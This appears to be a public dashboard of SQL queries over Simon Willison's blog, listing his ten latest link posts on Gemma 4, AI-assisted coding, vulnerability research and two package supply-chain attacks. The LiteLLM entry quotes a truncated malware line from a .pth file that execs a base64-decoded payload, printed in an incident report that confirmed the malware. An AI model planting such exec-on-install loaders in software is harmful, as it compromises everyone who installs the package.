Example dashboard

Various statistics from my blog.

Owned by simonw, visibility: Public

Entries

3288

SQL query
select 'Entries' as label, count(*) as big_number from blog_entry

Blogmarks

8334

SQL query
select 'Blogmarks' as label, count(*) as big_number from blog_blogmark

Quotations

1369

SQL query
select 'Quotations' as label, count(*) as big_number from blog_quotation

Chart of number of entries per month over time

SQL query
select '<h2>Chart of number of entries per month over time</h2>' as html
SQL query
select to_char(date_trunc('month', created), 'YYYY-MM') as bar_label,
count(*) as bar_quantity from blog_entry group by bar_label order by count(*) desc

Ten most recent blogmarks (of 8334 total)

SQL query
select '## Ten most recent blogmarks (of ' || count(*) || ' total)' as markdown from blog_blogmark
SQL query
select link_title, link_url, commentary, created from blog_blogmark order by created desc limit 10

10 rows

link_title link_url commentary created
Google AI Edge Gallery https://apps.apple.com/nl/app/google-ai-edge-gallery/id6749645337 Terrible name, really great app: this is Google's official app for running their Gemma 4 models (the E2B and E4B sizes, plus some members of the Gemma 3 family) directly on your iPhone. It works *really* well. The E2B model is a 2.54GB download and is both fast and genuinely useful. The app also provides "ask questions about images" and audio transcription (up to 30s) with the two small Gemma 4 models, and has an interesting "skills" demo which demonstrates tool calling against eight different interactive widgets, each implemented as an HTML page (though sadly the source code is not visible): interactive-map, kitchen-adventure, calculate-hash, text-spinner, mood-tracker, mnemonic-password, query-wikipedia, and qr-code. <img src="https://static.simonwillison.net/static/2026/gemini-agent-skills.jpg" alt="Screenshot of an &quot;Agent Skills&quot; chat interface using the Gemma-4-E2B-it model. The user prompt reads &quot;Show me the Castro Theatre on a map.&quot; The model response, labeled &quot;Model on GPU,&quot; shows it &quot;Called JS skill &#39;interactive-map/index.html&#39;&quot; and displays an embedded Google Map centered on a red pin at The Castro Theatre in San Francisco, with nearby landmarks visible including Starbelly, Cliff&#39;s Variety, Blind Butcher, GLBT Historical Society Museum, and Fable. An &quot;Open in Maps&quot; link and &quot;View in full screen&quot; button are shown. Below the map, the model states &quot;The interactive map view for the Castro Theatre has been shown.&quot; with a response time of 2.4 s. A text input field with &quot;Type prompt...&quot; placeholder, a &quot;+&quot; button, and a &quot;Skills&quot; button appear at the bottom." style="max-width: min(400px, 100%); margin: 0 auto; display: block;"> (That demo did freeze the app when I tried to add a follow-up prompt though.) This is the first time I've seen a local model vendor release an official app for trying out their models on in iPhone. Sadly it's missing permanent logs - conversations with this app are ephemeral. 2026-04-06 05:18:26+00:00
Eight years of wanting, three months of building with AI https://lalitm.com/post/building-syntaqlite-ai/ Lalit Maganti provides one of my favorite pieces of long-form writing on agentic engineering I've seen in ages. They spent eight years thinking about and then three months building [syntaqlite](https://github.com/lalitMaganti/syntaqlite), which they describe as "[high-fidelity devtools that SQLite deserves](https://lalitm.com/post/syntaqlite/)". The goal was to provide fast, robust and comprehensive linting and verifying tools for SQLite, suitable for use in language servers and other development tools - a parser, formatter, and verifier for SQLite queries. I've found myself wanting this kind of thing in the past myself, hence my (far less production-ready) [sqlite-ast](https://simonwillison.net/2026/Jan/30/sqlite-ast-2/) project from a few months ago. Lalit had been procrastinating on this project for years, because of the inevitable tedium of needing to work through 400+ grammar rules to help build a parser. That's exactly the kind of tedious work that coding agents excel at! Claude Code helped get over that initial hump and build the first prototype: > AI basically let me put aside all my doubts on technical calls, my uncertainty of building the right thing and my reluctance to get started by giving me very concrete problems to work on. Instead of “I need to understand how SQLite’s parsing works”, it was “I need to get AI to suggest an approach for me so I can tear it up and build something better". I work so much better with concrete prototypes to play with and code to look at than endlessly thinking about designs in my head, and AI lets me get to that point at a pace I could not have dreamed about before. Once I took the first step, every step after that was so much easier. That first vibe-coded prototype worked great as a proof of concept, but they eventually made the decision to throw it away and start again from scratch. AI worked great for the low level details but did not produce a coherent high-level architecture: > I found that AI made me procrastinate on key design decisions. Because refactoring was cheap, I could always say “I’ll deal with this later.” And because AI could refactor at the same industrial scale it generated code, the cost of deferring felt low. But it wasn’t: deferring decisions corroded my ability to think clearly because the codebase stayed confusing in the meantime. The second attempt took a lot longer and involved a great deal more human-in-the-loop decision making, but the result is a robust library that can stand the test of time. It's worth setting aside some time to read this whole thing - it's full of non-obvious downsides to working heavily with AI, as well as a detailed explanation of how they overcame those hurdles. The key idea I took away from this concerns AI's weakness in terms of design and architecture: > When I was working on something where I didn’t even know what I wanted, AI was somewhere between unhelpful and harmful. The architecture of the project was the clearest case: I spent weeks in the early days following AI down dead ends, exploring designs that felt productive in the moment but collapsed under scrutiny. In hindsight, I have to wonder if it would have been faster just thinking it through without AI in the loop at all. > > But expertise alone isn’t enough. Even when I understood a problem deeply, AI still struggled if the task had no objectively checkable answer. Implementation has a right answer, at least at a local level: the code compiles, the tests pass, the output matches what you asked for. Design doesn’t. We’re still arguing about OOP decades after it first took off. 2026-04-05 23:54:18+00:00
A visual guide to Gemma 4 https://newsletter.maartengrootendorst.com/p/a-visual-guide-to-gemma-4 Maarten Grootendorst joined Google DeepMind two months ago and has been working on the Gemma 4 release. 2026-04-04 16:08:19+00:00
Vulnerability Research Is Cooked https://sockpuppet.org/blog/2026/03/30/vulnerability-research-is-cooked/ Thomas Ptacek's take on the sudden and enormous impact the latest frontier models are having on the field of vulnerability research. > Within the next few months, coding agents will drastically alter both the practice and the economics of exploit development. Frontier model improvement won’t be a slow burn, but rather a step function. Substantial amounts of high-impact vulnerability research (maybe even most of it) will happen simply by pointing an agent at a source tree and typing “find me zero days”. Why are agents so good at this? A combination of baked-in knowledge, pattern matching ability and brute force: > You can't design a better problem for an LLM agent than exploitation research. > > Before you feed it a single token of context, a frontier LLM already encodes supernatural amounts of correlation across vast bodies of source code. Is the Linux KVM hypervisor connected to the `hrtimer` subsystem, `workqueue`, or `perf_event`? The model knows. > > Also baked into those model weights: the complete library of documented "bug classes" on which all exploit development builds: stale pointers, integer mishandling, type confusion, allocator grooming, and all the known ways of promoting a wild write to a controlled 64-bit read/write in Firefox. > > Vulnerabilities are found by pattern-matching bug classes and constraint-solving for reachability and exploitability. Precisely the implicit search problems that LLMs are most gifted at solving. Exploit outcomes are straightforwardly testable success/failure trials. An agent never gets bored and will search forever if you tell it to. The article was partly inspired by [this episode of the Security Cryptography Whatever podcast](https://securitycryptographywhatever.com/2026/03/25/ai-bug-finding/), where David Adrian, Deirdre Connolly, and Thomas interviewed Anthropic's Nicholas Carlini for 1 hour 16 minutes. I just started a new tag here for [ai-security-research](https://simonwillison.net/tags/ai-security-research/) - it's up to 11 posts already. 2026-04-03 23:59:08+00:00
Gemma 4: Byte for byte, the most capable open models https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4/ Four new vision-capable Apache 2.0 licensed reasoning LLMs from Google DeepMind, sized at 2B, 4B, 31B, plus a 26B-A4B Mixture-of-Experts. Google emphasize "unprecedented level of intelligence-per-parameter", providing yet more evidence that creating small useful models is one of the hottest areas of research right now. They actually label the two smaller models as E2B and E4B for "Effective" parameter size. The system card explains: > The smaller models incorporate Per-Layer Embeddings (PLE) to maximize parameter efficiency in on-device deployments. Rather than adding more layers or parameters to the model, PLE gives each decoder layer its own small embedding for every token. These embedding tables are large but are only used for quick lookups, which is why the effective parameter count is much smaller than the total. I don't entirely understand that, but apparently that's what the "E" in E2B means! One particularly exciting feature of these models is that they are multi-modal beyond just images: > **Vision and audio**: All models natively process video and images, supporting variable resolutions, and excelling at visual tasks like OCR and chart understanding. Additionally, the E2B and E4B models feature native audio input for speech recognition and understanding. I've not figured out a way to run audio input locally - I don't think that feature is in LM Studio or Ollama yet. I tried them out using the GGUFs for [LM Studio](https://lmstudio.ai/models/gemma-4). The 2B (4.41GB), 4B (6.33GB) and 26B-A4B (17.99GB) models all worked perfectly, but the 31B (19.89GB) model was broken and spat out `"---\n"` in a loop for every prompt I tried. The succession of [pelican quality](https://gist.github.com/simonw/12ae4711288637a722fd6bd4b4b56bdb) from 2B to 4B to 26B-A4B is notable: E2B: ![Two blue circles on a brown rectangle and a weird mess of orange blob and yellow triangle for the pelican](https://static.simonwillison.net/static/2026/gemma-4-2b-pelican.png) E4B: ![Two black wheels joined by a sort of grey surfboard, the pelican is semicircles and a blue blob floating above it](https://static.simonwillison.net/static/2026/gemma-4-4b-pelican.png) 26B-A4B: ![Bicycle has the right pieces although the frame is wonky. Pelican is genuinely good, has a big triangle beak and a nice curved neck and is clearly a bird that is sitting on the bicycle](https://static.simonwillison.net/static/2026/gemma-4-26b-pelican.png) (This one actually had an SVG error - "error on line 18 at column 88: Attribute x1 redefined" - but after [fixing that](https://gist.github.com/simonw/12ae4711288637a722fd6bd4b4b56bdb?permalink_comment_id=6074105#gistcomment-6074105) I got probably the best pelican I've seen yet from a model that runs on my laptop.) Google are providing API access to the two larger Gemma models via their [AI Studio](https://aistudio.google.com/prompts/new_chat?model=gemma-4-31b-it). I added support to [llm-gemini](https://github.com/simonw/llm-gemini) and then [ran a pelican](https://gist.github.com/simonw/f9f9e9c34c7cc0ef5325a2876413e51e) through the 31B model using that: llm -m gemini/gemma-4-31b-it 'Generate an SVG of a pelican riding a bicycle' Pretty good, though it is missing the front part of the bicycle frame: ![Motion blur lines, a mostly great bicycle albeit missing the front part of the frame. Pelican is decent. ](https://static.simonwillison.net/static/2026/gemma-4-31b-pelican.png) 2026-04-02 18:28:54+00:00
Announcing 1-bit Bonsai https://prismml.com/news/bonsai-8b PrismML is a newly out-of-stealth AI lab with [a focus](https://prismml.com/about) on researching "can we massively multiply intelligence in models without increasing their size or complexity?". Their first model release is a model called Bonsai, and it's very small indeed: it comes in 1.7B, 4B and 8B parameter sizes but uses 1 bit parameters. Here are the sizes of the resulting models on Hugging Face: <center><table> <thead> <tr> <th>Model</th> <th>Size</th> </tr> </thead> <tbody> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-8B-mlx-1bit">Bonsai-8B-mlx-1bit</a></td> <td>1.3 GB</td> </tr> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-8B-gguf">Bonsai-8B-gguf</a></td> <td>1.16 GB</td> </tr> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-4B-gguf">Bonsai-4B-gguf</a></td> <td>572 MB</td> </tr> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-4B-mlx-1bit">Bonsai-4B-mlx-1bit</a></td> <td>645 MB</td> </tr> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-1.7B-gguf">Bonsai-1.7B-gguf</a></td> <td>248 MB</td> </tr> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-1.7B-mlx-1bit">Bonsai-1.7B-mlx-1bit</a></td> <td>285 MB</td> </tr> </tbody> </table></center> 2026-04-01 20:20:04+00:00
Supply Chain Attack on Axios Pulls Malicious Dependency from npm https://socket.dev/blog/axios-npm-package-compromised Useful writeup of today's supply chain attack against Axios, the HTTP client NPM package with [101 million weekly downloads](https://www.npmjs.com/package/axios). Versions `1.14.1` and `0.30.4` both included a new dependency called `plain-crypto-js` which was freshly published malware, stealing credentials and installing a remote access trojan (RAT). It looks like the attack came from a leaked long-lived npm token. Axios have [an open issue to adopt trusted publishing](https://github.com/axios/axios/issues/7055), which would ensure that only their GitHub Actions workflows are able to publish to npm. The malware packages were published without an accompanying GitHub release, which strikes me as a useful heuristic for spotting potentially malicious releases - the same pattern was present for LiteLLM [last week](https://simonwillison.net/2026/Mar/24/malicious-litellm/) as well. 2026-03-31 23:28:40+00:00
Pretext https://github.com/chenglou/pretext Exciting new browser library from Cheng Lou, previously a React core developer and the original creator of the [react-motion](https://github.com/chenglou/react-motion) animation library. Pretext solves the problem of calculating the height of a paragraph of line-wrapped text *without touching the DOM*. The usual way of doing this is to render the text and measure its dimensions, but this is extremely expensive. Pretext uses an array of clever tricks to make this much, much faster, which enables all sorts of new text rendering effects in browser applications. Here's [one demo](https://chenglou.me/pretext/dynamic-layout/) that shows the kind of things this makes possible: <video autoplay loop muted playsinline poster="https://static.simonwillison.net/static/2026/pretex.jpg"> <source src="https://static.simonwillison.net/static/2026/pretex.mp4" type="video/mp4"> </video> The key to how this works is the way it separates calculations into a call to a `prepare()` function followed by multiple calls to `layout()`. The `prepare()` function splits the input text into segments (effectively words, but it can take things like soft hyphens and non-latin character sequences and emoji into account as well) and measures those using an off-screen canvas, then caches the results. This is comparatively expensive but only runs once. The `layout()` function can then emulate the word-wrapping logic in browsers to figure out how many wrapped lines the text will occupy at a specified width and measure the overall height. I [had Claude](https://claude.ai/share/7859cbe1-1350-4341-bb40-6aa241d6a1fe) build me [this interactive artifact](https://tools.simonwillison.net/pretext-explainer) to help me visually understand what's going on, based on a simplified version of Pretext itself. The way this is tested is particularly impressive. The earlier tests [rendered a full copy of the Great Gatsby](https://github.com/chenglou/pretext/commit/d07dd7a5008726f99a15cebe0abd9031022e28ef#diff-835c37ed3b9234ed4d90c7703addb8e47f4fee6d9a28481314afd15ac472f8d2) in multiple browsers to confirm that the estimated measurements were correct against a large volume of text. This was later joined by [the corpora/ folder](https://github.com/chenglou/pretext/tree/main/corpora) using the same technique against lengthy public domain documents in Thai, Chinese, Korean, Japanese, Arabic, and more. Cheng Lou [says](https://twitter.com/_chenglou/status/2037715226838343871): > The engine’s tiny (few kbs), aware of browser quirks, supports all the languages you’ll need, including Korean mixed with RTL Arabic and platform-specific emojis > > This was achieved through showing Claude Code and Codex the browsers ground truth, and have them measure & iterate against those at every significant container width, running over weeks 2026-03-29 20:08:45+00:00
We Rewrote JSONata with AI in a Day, Saved $500K/Year https://www.reco.ai/blog/we-rewrote-jsonata-with-ai Bit of a hyperbolic framing but this looks like another case study of **vibe porting**, this time spinning up a new custom Go implementation of the [JSONata](https://jsonata.org) JSON expression language - similar in focus to jq, and heavily associated with the [Node-RED](https://nodered.org) platform. As with other vibe-porting projects the key enabling factor was JSONata's existing test suite, which helped build the first working Go version in 7 hours and $400 of token spend. The Reco team then used a shadow deployment for a week to run the new and old versions in parallel to confirm the new implementation exactly matched the behavior of the old one. 2026-03-27 00:35:01+00:00
My minute-by-minute response to the LiteLLM malware attack https://futuresearch.ai/blog/litellm-attack-transcript/ Callum McMahon reported the [LiteLLM malware attack](https://simonwillison.net/2026/Mar/24/malicious-litellm/) to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container: > **Confirmed**. Fresh download from PyPI right now in an isolated Docker container: > > Inspecting: litellm-1.82.8-py3-none-any.whl > FOUND: litellm_init.pth > SIZE: 34628 bytes > FIRST 200 CHARS: > import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl... > > The malicious `litellm==1.82.8` is **live on PyPI right now** and anyone installing or upgrading litellm will be infected. This needs to be reported to security@pypi.org immediately. I was chuffed to see Callum use my [claude-code-transcripts](https://github.com/simonw/claude-code-transcripts) tool to publish the transcript of the conversation. 2026-03-26 23:58:22+00:00
Copy and export data

Duration: 5.11ms